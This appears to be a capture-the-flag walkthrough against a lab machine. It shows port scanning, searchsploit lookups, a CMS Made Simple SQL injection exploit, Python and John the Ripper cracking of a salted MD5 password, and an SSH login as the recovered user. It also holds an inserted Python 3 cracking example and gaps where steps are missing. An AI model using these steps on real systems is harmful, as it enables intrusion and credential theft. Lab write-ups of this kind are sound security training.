```
# Nmap 7.91 scan initiated Wed Feb 10 14:41:44 2021 as: nmap -sSVC -p- -oA nmap_full 10.10.168.133
Nmap scan report for 10.10.168.133
Host is up (0.037s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.19.77
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   closed http
2222/tcp open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 10 14:44:35 2021 -- 1 IP address (1 host up) scanned in 171.03 seconds
```
```
$ searchsploit -s openssh 7.2p2
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
OpenSSH 7.2p2 - Username Enumeration          | linux/remote/40136.py
OpenSSHd 7.2p2 - Username Enumeration         | linux/remote/40113.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results

$ searchsploit -p 40136
  Exploit: OpenSSH 7.2p2 - Username Enumeration
      URL: https://www.exploit-db.com/exploits/40136
     Path: /usr/share/exploitdb/exploits/linux/remote/40136.py
File Type: Python script, ASCII text executable, with CRLF line terminators

$ searchsploit -p 40113
  Exploit: OpenSSHd 7.2p2 - Username Enumeration
      URL: https://www.exploit-db.com/exploits/40113
     Path: /usr/share/exploitdb/exploits/linux/remote/40113.txt
File Type: ASCII text, with CRLF line terminators

$ grep CVE- /usr/share/exploitdb/exploits/linux/remote/40113.txt
CVE-ID CVE-2016-6210

$ grep CVE- /usr/share/exploitdb/exploits/linux/remote/40136.py
# CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari)
# Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210.
        if not args.silent: print("\n\nUser name enumeration against SSH daemons affected by CVE-2016-6210")
```
But I just understood that I wasn't supposed to look for a vulnerability targeting the
higher port service, but that by "application" the author meant the "web
application".
```
$ searchsploit -s cms made simple 2.2
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection                                | php/webapps/4810.txt
CMS Made Simple < 2.2.10 - SQL Injection                                            | php/webapps/46635.py
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)                      | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload                        | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated)            | php/webapps/48851.txt
CMS Made Simple 2.2.15 - RCE (Authenticated)                                        | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authentic | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution                       | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution                       | php/webapps/45793.py
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

$ searchsploit -p 46635
  Exploit: CMS Made Simple < 2.2.10 - SQL Injection
      URL: https://www.exploit-db.com/exploits/46635
     Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script, ASCII text executable, with CRLF line terminators

$ grep CVE- /usr/share/exploitdb/exploits/php/webapps/46635.py
```
To what kind of vulnerability is the application vulnerable?
Answer:
sqli
See previous steps.
What's the password?
Answer:
secret
Let's use the exploit:
```
$ python /usr/share/exploitdb/exploits/php/webapps/46635.py
  File "/usr/share/exploitdb/exploits/php/webapps/46635.py", line 25
    print "[+] Specify an url target"
          ^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("[+] Specify an url target")?
```
It's really a shame to create a Python 2 exploit in 2019, but let's execute it anyway.
```
$ python2 /usr/share/exploitdb/exploits/php/webapps/46635.py
Traceback (most recent call last):
  File "/usr/share/exploitdb/exploits/php/webapps/46635.py", line 12, in <module>
    from termcolor import colored
ImportError: No module named termcolor
```
Lol, it seems that coloured output was really so necessary for a PoC exploit that it
was worth adding a dependency for it. Let's install it:
If we want to crack the hash ourselves (for the purpose of learning), we can check the
source code of the exploit:
```python
def crack_password():
    global password
    global output
    global wordlist
    global salt
    dict = open(wordlist)
    for line in dict.readlines():
        line = line.replace("\n", "")
        beautify_print_try(line)
        # Python 2: str(salt) + line is a byte string, so md5() accepts it directly
        if hashlib.md5(str(salt) + line).hexdigest() == password:
            output += "\n[+] Password cracked: " + line
            break
    dict.close()
```
It seems the hash uses the format md5(salt + password).
So if we check the extended entries of haiti, we can find the corresponding
hashcat or JtR code:
It's mode 20 for hashcat, and haiti lists no code for JtR.
There is still a solution for JtR (the dynamic_4 format), but it has a limitation on
the salt size, so let's verify that first.
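Before committing to a hashcat mode or a JtR dynamic format, it is worth confirming which salted-MD5 layout the hash really uses. The following is an added Python 3 example (not part of the original post or of the exploit): it checks a known salt/hash/password triple against both md5($salt.$pass) and md5($pass.$salt), and ports the exploit's crack_password() loop to Python 3 so it copes with CRLF wordlists and blank lines. The salt, hash and wordlist are constructed for the example; mode 20 is the one the post names, and mode 10 is hashcat's documented mode for md5($pass.$salt).

```python
import hashlib

# Constructed sample values for this example only (not the target's real salt/hash).
SAMPLE_SALT = "a1b2c3"
SAMPLE_PASSWORD = "secret"
SAMPLE_HASH = hashlib.md5((SAMPLE_SALT + SAMPLE_PASSWORD).encode()).hexdigest()

# Constructed mini wordlist, with CRLF endings and a blank line as real lists often have.
SAMPLE_WORDLIST = "123456\r\nkenny\n\nsecret\npassword\n"

# The two common salted-MD5 layouts and the hashcat mode that cracks each of them.
FORMATS = {
    "md5($salt.$pass)": (lambda s, p: s + p, 20),
    "md5($pass.$salt)": (lambda s, p: p + s, 10),
}


def md5_hex(data: str) -> str:
    """MD5 of a text string, hex-encoded (Python 3 needs explicit bytes)."""
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def identify_format(salt: str, digest: str, known_password: str):
    """Return (format name, hashcat mode) for the layout that reproduces
    `digest` from a known password, or None if neither layout matches."""
    for name, (combine, mode) in FORMATS.items():
        if md5_hex(combine(salt, known_password)) == digest.lower():
            return name, mode
    return None


def crack_salt_pass(salt: str, digest: str, wordlist_text: str):
    """Python 3 port of the exploit's crack_password(): try md5(salt + word)
    for every word and return the first match, or None."""
    target = digest.lower()
    for line in wordlist_text.splitlines():  # handles both \n and \r\n
        if not line:                          # skip blank lines
            continue
        if md5_hex(salt + line) == target:
            return line
    return None


if __name__ == "__main__":
    print(identify_format(SAMPLE_SALT, SAMPLE_HASH, SAMPLE_PASSWORD))
    print(crack_salt_pass(SAMPLE_SALT, SAMPLE_HASH, SAMPLE_WORDLIST))
```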
```
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=dynamic_4
Using default input encoding: UTF-8
Loaded 1 password hash (dynamic_4 [md5($s.$p) (OSC) 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
edited           (mitch)
1g 0:00:00:00 DONE (2021-02-10 16:47) 25.00g/s 42000p/s 42000c/s 42000C/s 123456..kenny
Use the "--show --format=dynamic_4" options to display all of the cracked passwords reliably
Session completed
```
```
$ ssh mitch@10.10.168.133 -p 2222
The authenticity of host '[10.10.168.133]:2222 ([10.10.168.133]:2222)' can't be established.
ECDSA key fingerprint is SHA256:Fce5J4GBLgx1+iaSMBjO+NFKOjZvL5LOVF5/jc0kwt8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.168.133]:2222' (ECDSA) to the list of known hosts.
mitch@10.10.168.133's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ id
uid=1001(mitch) gid=1001(mitch) groups=1001(mitch)
```